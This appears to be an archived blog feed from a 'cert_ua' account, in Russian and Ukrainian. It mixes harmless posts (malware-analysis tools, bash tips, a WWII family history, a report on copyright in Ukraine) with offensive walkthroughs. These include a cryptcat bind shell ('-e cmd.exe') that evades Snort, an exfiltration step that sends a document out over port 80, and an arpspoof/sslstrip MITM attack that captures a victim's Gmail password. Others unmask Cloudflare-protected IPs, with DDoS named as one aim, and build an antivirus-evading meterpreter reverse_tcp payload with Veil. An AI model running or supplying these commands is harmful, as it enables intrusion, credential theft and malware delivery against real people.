Cyber Security Assessment Netherlands 2015: cross-border cyber security approach necessary
cert_ua
subj

Почему я не пользуюсь скайпом
cert_ua
потому что можно узнать время входа/выхода, прихода/ухода на работу, ИПы всех устройств и провайдеров, через которые я выхожу и т.д.

О том как это работает, написано тут.

...интересно, что для совсем свежих и очень старых учёток это не всегда пашет.

Пробить историю ИПа и доменов с ним связанных можно тут или CIRCL MISP так (суррогатые Passive DNS).
Узнать по клиенту.

Пр0стые утилиты для анализа вредоносного софта
cert_ua
Исследователь вредоносного кода должен знать как работает ОС, уметь работать с софтом, сетью, программировать, знать что к чему в машинном коде. Для того, чтобы было ему стало понятно что делает какой-либо кусок машинного кода, достаточно иметь в своём распоряжении несколько простых утилит, о которых я расскажу дальше. Конечно, ими надо научиться пользоваться и их достаточно далеко не всегда.

Поехали.

0. PEiD - утилика для определения типа пакера, криптора и компилятора.

Те, кто пишут малварей, почти всегда пакуют или обфусцируют тело малваря для усложнения их поиска, выявления и анализа. Текущая версия PEiD 0.95 определяет почти 500 сигнатур, которые хранятся в файлике с названием userdb. Офсайт уже не активен(( Дефолтный файл userdb надо заменить скачанным по ссылке.

1. Dependency walker - фриваре для сканирования 32- и 64-битных модулей Windows (.exe, .dll, .ocx и т.д.).

Dependency walker служит для перечисления всех импортированных и экспортированных модулем функций. Аналогичные функции есть и у отладчиков, но эта тулза явно проще. Dependency walker так же показывает минимальный набор зависимостей файла от других, а так же детальную информацию об этих файлах (путь, размер, версия, тип машины, дебажную информацию и т.д.).

2. Resource hacker (иногда его зовут ResHacker) - утилита для извлечения ресурсов (строки, рисунки, меню, диалоги, VersionInfo и Manifest'ы) из двоичных файлов Windows.

3. PEview - инструмент для просмотра хранимой в заголовках (headers) исполняемых PE-файлов (Portable Executable). Этот просмотрщик хидеров может помочь в изучении заголовков файлов реальных малварей.

4. FileAlyxer - фриварная тулза для чтения информации из заголовков PE-файлов, но предоставляет гораздо больше возможностей, функционала чем PEview.
Прекрасная фича - возможность получить отчёт из VirusTotal, а так же распаковка файлов, упакованных с помощью UPX и PECompact.


ПС: да, есть и аналоги и не под винду, я о них знаю -_-

BASH work with text
cert_ua
1. Remove empty strings from file:

cat something.txt | sed '/^$/d'

2. Select only ip addresses from file:

grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" some-text-with-IPs.txt

3. Wipe HDD securely by writing random signs on it (filesystem creating is needed after this):

dd if=/dev/urandom of=/dev/sda bs=1M

...or with using openssl:

head -c 32 /dev/urandom | openssl enc -rc4 -nosalt -in /dev/zero -pass stdin | dd of=/dev/sda bs=1M

4. Bash script for filtration of some text from binary files:

cat > ./scribd.sh

#!/bin/bash
# bin-grep.sh: Поиск строк в двоичных файлах.

# замена "grep" для бинарных файлов.
# Аналогично команде "grep -a"

E_BADARGS=65
E_NOFILE=66

if [ $# -ne 2 ]
then
echo "Порядок использования: `basename $0` string filename"
exit $E_BADARGS
fi

if [ ! -f "$2" ]
then
echo "Файл \"$2\" не найден."
exit $E_NOFILE
fi


for word in $( strings "$2" | grep "$1" )
# Инструкция "strings" возвращает список строк в двоичных файлах.
# Который затем передается по конвейеру команде "grep", для выполнения поиска.
do
echo $word
done

# Как указывает S.C., вышепрведенное объявление цикла for может быть упрощено
# strings "$2" | grep "$1" | tr -s "$IFS" '[\n*]'


# Попробуйте что нибудь подобное: "./bin-grep.sh mem /bin/ls"

exit 0

adding eXecution writes for file:
chmod +x ./scribd.sh

launch example:
./scribd.sh *.jpg /somebinarytext.dmp

result:
root@wo0t:~# ./scribd.sh .jpg /tmp/text.dmp | grep https
https://7.2.201.61/2.jpg
https://23.129.197.50/2.jpg
https://67.222.201.222/2.jpg
https://12.13.23.43/1.jpg
https://45.64.15.1/2.jpg
https://16.68.9.38/12.jpg
https://150.9.49.11/12.jpg
https://27.1.20.53/w2.jpg
https://23.9.18.14/w2.jpg
https://23.92.13.154/w.jpg
https://23.9.13.4/we.jpg

5. Some custom logfile.txt like

FirstSeen LastSeen Count IP Country Company Domain ASN SrcPt Action Request Host UserAgent Node NodeID Threat
2015-09-20 23:59:09.707 2015-09-21 23:56:46.451 2021 123.123.123.234 UA 1066 1046 N 4F:B2:78:6A B68-2-32

may be parsed with oneline bash script:

for i in $(grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" ./logfile.txt); do nslookup $i | grep "name =" | cut -f 2 -d"="; done;

result:
root@wo0t:~# for i in $(grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" ./msiplist.txt); do nslookup $i | grep "name =" | cut -f 2 -d"="; done;
scene.rumour.volia.net.
95.158.3.150.best.net.ua.
108-172-94-178.pool.ukrtel.net.
93-76-214-28.dynamic-FTTB.kharkov.volia.com.
58-233-92-178.pool.ukrtel.net.
46-229-51-21.kievnet.com.ua.
C53xx-lo0.dp.velton.ua.

Апдейт по в\ч прадеда (648 аап ргк или 110 гап)
cert_ua
Ранее я писал о моих попытках найти про моего воевавшего прадеда и его подразделение, информацию.

Я нашёл и рассказал в трёх постах (1, 2 и 3) про его награды и славный боевой путь, а заодно испробовал современные источники информации на эту тему.

Вот новое обновление:

В марте 2013 года РПЦ освятила боевое знамя недавно передислоцированной в п. Тоцкое-2 Оренбургской области. Об этом подробно написано тут.


Историческая справка по вч 32755 (так теперь в РФ называется ) такова:

История воинской части 32755 берет свое начало 23 июня 1941 года. Спустя месяц – 23 июня 1941 года артиллеристы приняли первый бой севернее Кишинева, долгое время не давая противнику переправиться через Днестр. В начальном периоде Великой Отечественной войны офицеры и солдаты части пережили отступление и тяжелейшие оборонительные бои под Николаевом, Донецком, Харьковом, Ростовом. За годы войны полк и бригада прошли 8,3 тысячи километров, артиллеристы произвели около 85 тысяч выстрелов по противнику. Из 1418 дней войны только 54 дня часть была в резерве, еще около ста – на формировании или в резерве фронта, а остальные дни – в боях в составе войск 9-ой, 12-ой, 37-ой, 38-ой, 66-ой, 21-ой, 2-ой гвардейской, 44-ой, 28-ой, 3-ей гвардейской и 5-ой ударной армий.
Батареи части участвовали в знаменитой артподготовке 19 ноября 1942 года, возвестившей начало операции по окружению войск фельдмаршала Паулюса. «За участие в героической обороне Сталинграда» личный состав 648-го армейского артполка РГК награжден медалью «За оборону Сталинграда» (указ Президиума Верховного Совета СССР от 22.12.1942).
За отличия в боях с немецкими захватчиками в Сталинградской битве 648-ый аап РГК преобразован в 110-й гвардейский армейский пушечный артиллерийский полк РГК (приказ НКО СССР от 01.03.1943 № 102).
10 мая 1943 года из Москвы доставлено гвардейское знамя и приказ № 102 НКО от 1 марта 1943 года – за мужество и героизм, проявленный в боях за г. Сталинград, бригаде присвоено звание «Гвардейская».
10 апреля 1944 года за мужество, храбрость и отвагу, проявленные при освобождении г. Одессы, бригаде присвоено почетное наименование «Одесская».
За участие в освобождении Варшавы личный состав бригады награжден медалью «За освобождение Варшавы».
19 февраля 1945 года за образцовое выполнение заданий командования в боях по овладению городов: Сохачева, Скерневицы, Ловига и проявленные при этом доблесть и мужество бригада награждена орденом «Красного Знамени».
28 мая 1945 года за проявленное мужество, отвагу и героизм при взятии Берлина бригада награждена орденом Богдана Хмельницкого II степени.
За участие в героическом штурме и взятии Берлина личный состав бригады награжден медалью «За взятие Берлина».
Места дислокации: 1945-1994 годы – в составе Советских войск в Германии; 1994-1999 годы – п. Тоцкий Оренбургской области; 1999-2001 год – г. Пермь; 2001-2012 г – п. Звездный Пермского края. С 2012 года – п. Тоцкий Оренбургской области

Лично мне интересна судьба боевого знамени кумачёвого цвета, что на фото этого репортажа (если конечно это оригинал). Эдакий артефакт)


Так же знаю что обновился движок сайта http://podvignaroda.ru и теперь наградной листок прадеда выглядит примерно так:

http://podvignaroda.ru/?#id=17044374&tab=navDetailDocument

True криптография
cert_ua
Прикольная на мой взгляд утилитка, входящая в состав BackTrack и Kali Linux - cryptcat. Она не только умет создавать соединение между двумя ПК на любом порту (как это делает netcat), но и шифрует это соединение алгоритмом twofish (алгоритм разработки Bruce Schneier'а).

Шифрование сессии [почти идеально] скрывает от систем выявления вторжений информационный обмен, даже если он происходит через обычные порты 80 и 443.

Поехали /взмахнул ногой

1. Качаем cryptcat под винду отсюда.
2. Открываем слушающий сокет (listener) в винде на порту, скажем, 9119, после чего запускаем командный интерпретатор (shell):

cryptcat -l -p 9119 -e cmd.exe

3. Запустим Snort в качестве этого Вашего IDS на машине с Linux чтобы слушать траф и услышать, если он будет  подозрительным в процессе взаимодействия

snort -dev -c /etc/snort/snort.conf

4. Коннектимся с помощью cryptcat к винде

cryptcat 192.168.0.199 9119

Если всё ок - должно появиться приглашение шелла винды. Дальше дело за расширением полномочий. Так как пересылка шелла через сеть - атака, то проверим что отловил snort своими правилами. По идее, в случае незашифрованной передачи cmd.exe стриггерится соответствующая сигнатура. Но мы не увидим ничего подозрительного в логах снорта - /var/snort/alerts


5. Пересылка cryptcat через 80 порт и обход фаерволла

Ладно, криптованное соединение создано, но оно использует заметный для внимательного админа порт 9119, который он заблочит руками, либо ногами фаерволом.

Для общения через интернеты необходимы порты 80 и 443, а опционально - 25, 53 и 110. Но порт 80 открыт всюдуц и везде, его и используем для создания шифрованного соединения, как наиболее незаметный и широко используемый.

Итак, на машине-жертве под виндой создам очень-важный-документ.txt, который отошлю (вместо шелла винды как в прошлый раз) в зашифрованном виде.

cryptcat -l p 80 < очень-важный-документ.txt

Теперь приконнекчусь к жертвенной винде, указав айпи и порт, на котором она слушает:

cryptcat 192.168.0.199 80

Проверка логов снорта порадует стабильностью отсутствия каких-либо событий безопасности. Ну и хорошо.

Так-то.

Перехват данных из SSL-соединения (читаем почту юзеров локалки через https)
cert_ua
Покажу и расскажу как с помощью утилиты sslstrip перехватить данные которые передаются по защищенному SSL-соединению.
Утилитка sslstrip в моем примере (после проведения атаки типа ARP-spoofing на жертву) перехватит запрос веб-клиента жертвы на установление защищенного SSL-соединения и заставит его использовать незащищенныый протокол HTTP. Далее я просто подсмотрю то, что делает жертва, не обратившая внимание на то, что она читает почту не по HTTPS, а по HTTP.

Вы убедитесь в том как просто можно организовать атаки типа MITM на SSL путем техник arp-spoof и проги sslstrip.

Поехали.

В моем примере жертва - виртуалка с ИПом 10.10.11.163 (обычная тачка с виндой), ПК с которого я атакую - 10.10.11.85 с установленной ОС Kali и с sslstrip (эта утилита предустановлена в пентестерских дистрибутивах Kali\BackTrack Linux). Между нами шлюз с ИПом 10.10.11.1.

1. При заходе жертвы на gmail.com ее кидает на адрес https://gmail.com и это нормально. Естественно, пароли и логины к почте жертвы мы в открытом виде не видим.

2. Включаю маршрутизацию трафика на ПК с Кали:

echo "1" > /proc/sys/net/ipv4/ip_forward

и настраиваю iptables таким образом, чтобы весь http-трафик направлялся на порт 81:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 81

теперь заставлю жертву считать, что моя тачка - это шлюз (проведу атаку ARP-spoofing) с помощью команды

arpspoof -i eth0 -t 10.10.11.163 10.10.11.1

теперь трафик жертвы ходит через мою тачку и (согласно моего правила iptables) форвардится на 81 порт.

3. Запускаю sslstrip

sslstrip -a -l 81 -w /root/Desktop/ssllog.txt

это создаст файлик лога прямо на рабочем столе и начнет писать в него перехваченный http-трафик (собственно, перехватываться-то будет HTTPS, но он будет strip'аться). Ну вобщем, запускаю на консоли смотрение этого файлика:

tail -f /root/Desktop/ssllog.txt

4. Жертва идет на свою почту

Для чтения почты жертва как всегда лезет в MS Explorer (хехе) и вводит там gmail.com. Но браузер почему-то не перекидывает жертву на https (в адресной строке http)! На рисунке ниже изображено то что увидит жертва в последний миг перед тем, как я узнаю ее пароль и логин.



Жертва жмакает "Войти"...а на моем окошке, куда выводился перехваченный трафик я вижу следующее:



Как видно, пароль 1q2w3e4r5t6y...

Чтобы избежать угроз, связанных с перехватом начала SSL-соединения, надо:
- не юзать гаджеты в недоверенных сетях, даже если это очень надо (злодей может устроить MITM с гораздо бОльшей вероятностью, скажем, в аэропорту путем установки rogue wireless access point, чем ломанув корпоративную сеть вашей организации);
- шифровать почту симметричными протоколами шифрования (пишу и думаю о PGP);
- платить нормальную зарплату админу чтоб у него не возникало желания шпионить за вашими сотрудниками таким образом;
- следить за ARP-таблицей и юзать оборудование/софт, которое отслеживает подбные атаки;
- регулярно обновлять ПО из доверенных легальных источников.


Помните, что статья иллюстрирует то, что запрещено законом и примеры в ней приводятся с целью показать простоту организации атак на SSL в исключительно образовательных целях.

как найти IP сайта на cloudflare
cert_ua
Поиск айпи-адреса обычно упрощается за счет плохо настроенных админами сервисов, но я опишу пару эффективных способов.

Эта задача часто нужна с целью локализации и устранения угроз, исходящих от вредоносных сайтов, использующих cloudflare в качестве противоабузного и противо-DDoS сервиса. Сервис cloudflare скрывает айпи-адрес такого сайта, потому сложно адрессовать абузу (жалобу) или устроить ДДоС-атаку на этот сайт.

Конечно,  ДДоСить неугодный Вам сайт на cloudflare - это незаконно.

метод 1: брутфорс субдоменов

пинганите домен - это даст неправильный айпи сайта. дальше пинганите домены:

direct-connect.<домен.ком>

direct.<домен.ком>

ftp.<домен.ком>

cpanel.<домен.ком>

mail.<домен.ком>

метод 2: используйте netcraft toolbar

Для доменов с длительным временем жизни, введя в браузер что-то типа

http://toolbar.netcraft.com/site_report?url=домен.ком

метод 3: брутфорс доменов

При брутфорсе субдоменов некоторые субдомены могут иметь реальные айпи.
Для этого можно использовать nmap

nmap -sV -sS -F домен.ком

, что даст понимание испоьзуется ли cloudflare или нет.

Далее стартуем сам брутфорс:

nmap --script dns-brute -sn
домен.ком


метод 4: скрипт на баше

Идем сюда, качаем, делаем запускаемым и скрипт тестирует все вышеперечисленные методы))

Авторське право на Україні
cert_ua
333

Україна — одна з країн, де авторське право порушується постійно та у великих масштабах. Прикладом того, що Україна є розповсюдницею піратства та є піратом №1 у світі є потрапляння України у “Спеціальний звіт 301”, який щорічно готується Офісом торгового представника США (USTR). Про це ж у своєму звіті інформує Уряд США і Міжнародний альянс інтелектуальної власності (IIPA). Не зважаючи на складне політичне становище дії Уряду України недостатні і визивають розчарування у авторів звіту, бо темпи реформ направлених на боротьбу з явищами, які привели Україну до визнанння США країною піратом 1 у світі повільні. Протягом декількох останніх років головні претензії США стосувалися трьох критичних проблем у сфері прав інтелектуальної власності в Україні — це відсутність:



1) Ефективних і системних засобів боротьби з порушенням авторського права і суміжних прав в Інтернеті;

2) Несправедливого, непрозорого адміністрування системи збору авторської винагороди;

3) Механізмів впровадження ліцензійного програмного забезпечення урядовими установами України.

Завдяки потраплянню у цей звіт Україна понесла колосальні репутаційні і фінансові збитки. Відновлення репутації — тривалий та складний процес, а щорічні прямі фінансові збитки дорівнюють приблизно 160 млн. доларів США на рік тільки на втратах преференцій по миту. Непрямі ж збитки України, наприклад, не зроблені інвестиції в інтелектуальну сферу, ще більші. В деяких країнах вкладення в інтелектуальну сферу перевищують вкладення в інші сфери (економіка, промисловість т.і.), тому ми втрачаємо дійсно колосальні активи.

З досліджень IIPA цього року випливає, що основні претензіі у звіті стосуються економічних інтересів правовласників США, тобто наголос на їхні збитки. Але зважаючи на те, що політика і практика України щодо функціонування інституту права інтелектуальної власності залишається неідеальною, торговий представник визначив, що на даний час, політична ситуація в Україні змушує не застосовувати ніяких дій і цінує ті взаємини, які складаються останнім часом з урядом України, які направлені на постійну взаємодію у вивченні як поліпшити виявлені проблеми і загальний режим застосування інтелектуальної власності.

В 2015 році IIPA вважає пріоритетом для уряду України правові реформи і рекомендує наступні дії:


  • поліпшити правове регулювання організацій з колективного управління;


  • застосувати кримінальну відповідальність та судове переслідування власників сайтів, які розміщують на безоплатній основі кіно, книги, музику, ПЗ тощо, а також розібратися з власниками BitTorrent.


  • ввести у дію принципи, які б унеможливили використання ліцензій без дозволу правовласників.


Також у звіті йдеться про наявність в Україні організованих злочинних синдикатів і пропонується активно з ними боротися.

Щодо правових реформ, то IIPA пропонує спрямовання їх на:

- зміни до закону про авторське право, закону про телекомунікації та Кодексу про адміністративні правопорушення, з метою сприяння ефективному реагуванню боротьби з інтернет-піратством, в тому числі:

1) забезпечення правових стимулів для провайдерів, які співпрацюють з правовласниками і ефективно боряться з інтернет-піратством;

2) визначитися з переліком послуг, які сприяють порушенню авторського права і суміжних прав або які полегшують таке порушення;

3) забезпечити судову заборону порушень в Інтернет, ввести мито для провайдерів та зобовязати їх надавати інформацію в правоохоронні органи і правовласникам.

У жовтні 2014 року, міжнародні експерти в області інтелектуальної власності підготували деякі пропозиції до змін у законопроекті Державної служби по боротьбі з порушеннями в Інтернет, щоб належним чином вирішити вищенаведені проблеми. ЇХ треба негайно прийняти. А також забезпечити:· прийняття Закону про колективне управління, в якому би містилися вимоги сформульовані у звіті IIPA за 2015 Special 301: Україна та відповідали б статті 168-ЄС Угоди України про Асоціацію з ЄС (доречі, тут авторському праву присвячено цілий розділ 3) щодо двосторонніх угод з іноземними організаціями та вимогою працювати прозоро і ефективно;

- зміни до закону про авторське право і Кримінальний кодекс, для того щоб зробити camcording в кінотеатрах незаконною діяльностю, а також зміни до закону про кінематографію щодро місцевого виробництва фільмокопій;

- кримінально-виконавчі дії, в тому числі судові переслідування за порушення в цілому на відкритих ринках, вулицях і недалеко від місцевих магазинів і супермаркетів.

- адміністративні та митні норми права, які б були орієнтовані проти copyrightinfringing кабельного мовлення і ретрансляцію публічного сповіщення на радіо і ТБ. Полсилення прикордонного контролю, особливо вздовж кордону з Росією тощо.

У звіті перераховані всі популярні піратські сайти, які працюють в Україні,це: EX.ua (правда, у звіті згадується, що в 2014 році сайт спілкувався з правовласниками і видаляв контент з порушеннями); extratorrent.cc; sumotorrent.sx; futubox (хоститься в Румунії, але управляється з України); newalbumreleases.com (хоститься в Україні); jams.to (хоститься в Україні).

У звіті згадується, що хостинг надається сотням піратських сайтів і торрентів, таким як torrentbit.net, btloft.com, bitloft.org, torrentz.cd, torrentpond.com, btmon.com, torrentz.wf та ін.

Дослідники Альянсу обурюються, що в 2014 році жодна кримінальна санкція не була застосована в Україні у справах про інтернет-піратство (відповідно до користувачів, адміністраторів або власників сайтів). Також згадуються локальна мережа (LAN) за межами Києва, де на FTP на високій швидкості можна знайти і скачати масу контенту, з порушенням права правовласників.

CERT-UA розуміє, що права авторів треба поважати. Ми намагаємось використовувати тільки ліцензійне програмне забезпечення і пропонуємо робити це всім іншим. Сподіваємось, що невдовзі будуть прийняті необхідні нормативні зміни. У перспективі командою CERT-UA планується налагодити можливість реагування на інциденти щодо порушення авторського права. Ми розуміємо, що великою мірою до піратства Україна вимушена внаслідок відсутності бачення альтернативи при використанні програмних виробів open source у державному секторі. З метою допомоги владним структурам нами планується налагодити веб-хостинг та електронну пошту для державних потреб, про що повідомлялось у ЗМІ.


СЕРТ-UA готується розглядати у подальшому хостинг противоправного контенту у якості кіберинциденту і реагувати на
нього в рамках законодавства після його появи. Планується, також, консультувати за погодженням відповідального за це
міністерства правовласників та громадськість про авторське право та, наприклад, як краще зібрати докази для
судового блокування контенту, що порушує авторське право.



Про проблеми з авторським правом CERT-UA знає й на власному досвіді — ми подали заяву на отримання свідоцтва про реєстрацію торгової марки CERT-UA вже рік тому. Цей процес (якщо його не «прискорювати») на Україні зазвичай займає близька півтора роки. А поки що якось так:
332

Обход антивируса, как написать сэмпл, НЕ делиться им с антивирусами и о скорости реакции антивирусов
cert_ua




Есть такая утилита в пакете Kali Linux как Veil, которая позволяет:


  • обходить установленную антивирусную защиту


  • скачивать и устанавливать пейлоады из Metasploit framework и из предстоящих версий Metasploit


  • пытаться создать пейлоад максимально случайным и трунораспознаваемым


Последняя текущая версия Veil — 2.3.14. С недавних пор (v. 2.0.4) Veil стал поддерживать архитектуры x86 и x64 и получил возможность обновления. Мануалы лежат тут - http://www.veil-evasion.com а фреймворк можно скачать с github - https://github.com/ChrisTruncer/Veil/ или отсюда https://github.com/ChrisTruncer/Veil/archive/master.zip. Важно отметить, что разработчики Veil не хотят поддерживать возможность загрузки пейлоадов на www.virustotal.com чтобы не помогать разработчикам антивирусов. Есть альтернатива этого ресурса — vscan.novirusthanks.org, который сканирует подозрительные файлы на предмет вредоносного ПО и предлагает опцию “не предоставлять сэмпл” (Do not distribute the sample).

Установка Veil под Kali Linux:

apt-get update

apt-get install veil

Покажу как обходить антивирусную защиту нескольких известных производителей.

По умолчанию после установки Veil имеет 35 готовых пейлоадов, использую их командой use:

антивирусная эпопея_html_94866445



После этого veil даст больше информации о пейлоадах. Я выбрал python/shellcode_inject/base64_substitution набрав 29

антивирусная эпопея_html_838ff6dc



Когда мой пейлоад загружен, пишу "generate". Тут можно использовать некоторые специфические опции, но в примере используем опции по умолчанию (да, я знаю что это плохо).

антивирусная эпопея_html_4302123c



Теперь используем msfvenom нажав “1”

антивирусная эпопея_html_cd43a078



После этого нам необходимо ввести некоторые дополнительные данные:


  • вводим название пейлоада из metasploit: "windows/meterpreter/reverse_tcp"


  • вводим значение 'LHOST', [tab] for local IP: "10.10.11.63"


  • вводим значение 'LPORT': "443"


антивирусная эпопея_html_7cbb94ac



Теперь необходимо подождать пока сгенерируется шеллкод.

Надо нажать энтер и Veil запросит имя пейлоада. В нашем случае имя будет "undetectable_sh1t"

антивирусная эпопея_html_c090b697



Использую Pyinstaller для создания исполняемого файла с расширением .exe. Для этого наберём “1”.

антивирусная эпопея_html_fbfa7ca8



После этого можно забрать ехе-шник из "/root/veil-output/compiled/"

К сожалению, мой veil на последней стадии ругнулся на отсутствие питона, после чего вышел вон:

антивирусная эпопея_html_b20f0bd2



Эти строки я загуглю потом 8)

[!] ERROR: Can't find python.exe in /root/.wine/drive_c/Python27/

[!] ERROR: Make sure the python.exe binary exists before using PyInstaller.

чтобы было понятно, скажу что питон надо для того чтоб скомпилировать мой пейлоад тем компилятором и в той операцинной системе, где планируется его дальнейший подрыв (запуск). В моем случае veil попытался поднять питон в эмуляторе Windows — wine и это ему не удалось. Я зашел в папку /root/.wine/drive_c/Python27 но питоновского ехе-шника там не нашел. Тут можно было бы разбираться разными способами, но я подумал что питон — не родной компилятор для виндовс-систем и гораздо ближе и роднее компилятор си (было поздно и хотелось дойти до конца этой статьи еще сегодня).

Кстати, тем кто не любит интерактивных интерфейсов, скажу что все эти действия можно было сделать примерно такой командой:


Veil.py -l python -p python/shellcode_inject/base64_substitution -o undetectable_sh1t --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=10.10.11.63 LPORT=443




Я вернулся командой back в изначальное меню выбора пейлоадов и выбрал пункт 6 (c/meterpreter/rev_tcp_service). Далее по аналогии с предыдущим примером задал командой

set LHOST 10.10.11.63

необходимые переменные, после чего дал команду generate.

антивирусная эпопея_html_7dab2645



Этот пейлоад я назвал по-другому

антивирусная эпопея_html_735dd56c


Выдалось долгожданное сообщение об успехе компиляции пейлоада:

антивирусная эпопея_html_359faf11


Теперь у нас есть исполняемый файл, для которого мы посчитаем md5-сумму (это как отпечатки пальцев)

антивирусная эпопея_html_3b836a1a


 которую (8437b8261c85369a700456704fd7ed85) мы скормим сайту novirusthanks.org, а именно — сервису Monitor Malicious Executable URLs.

антивирусная эпопея_html_bd374f05

Сайт кушает URL, ссылки, адреса и md5-суммы (надо выбрать вверху Search Database)

антивирусная эпопея_html_de3b8f85



Загрузим нашу сумму в окошко для мд5-сумм чтоб потестировать его реальную невидимость для антивирусных образцов. Жму кнопочку Search...

антивирусная эпопея_html_a07beb13


...и в базе нет такой суммы

антивирусная эпопея_html_3fb13d13


Кстати, есть еще аналогичный анонимный и без расшаривания самплов ресурс. Его легко найти как показано на скрине ниже. Работает или нет — не проверял, но пишут что есть 4 ежедневные бесплатные проверки 33 движками антивирусов и БЕЗ предоставления сэмпла третьим лицам.

антивирусная эпопея_html_2bdd177f


Теперь проверим скорость реакции антивирусов на новый сэмпл))) ведь сравнением именно этой скорости проще всего сравнить антивирусы. Для этого просто скормлю свой сэмпл вирустоталу (не жалко) и посмотрю отчет сразу и через некоторое время.

антивирусная эпопея_html_bf21a08e





Тоесть на момент компиляции сэмпла 14 из 57 антивирусов отдетектили новый вредонос.

хм...через 15 часов результат тот же. Через сутки - то же самое:

Снимок экрана от 2015-03-04 19:50:22

Выходит, что реакция антивирусов на новый сэмпл который выложен на вирустотале - больше суток.

апдейт через НЕДЕЛЮ (10.03.2015) дал следующий результат

Снимок экрана от 2015-03-10 11:44:30
Снимок экрана от 2015-03-10 12:45:32

Короче, даже недели времени некоторым антивирусам мало, чтобы проработать и эффективно выявлять новый сэмпл. Даже мой, простой сэмпл через неделю распознают примерно половина антивирусов, судя по данным вирустотала.

так-то.

?

Log in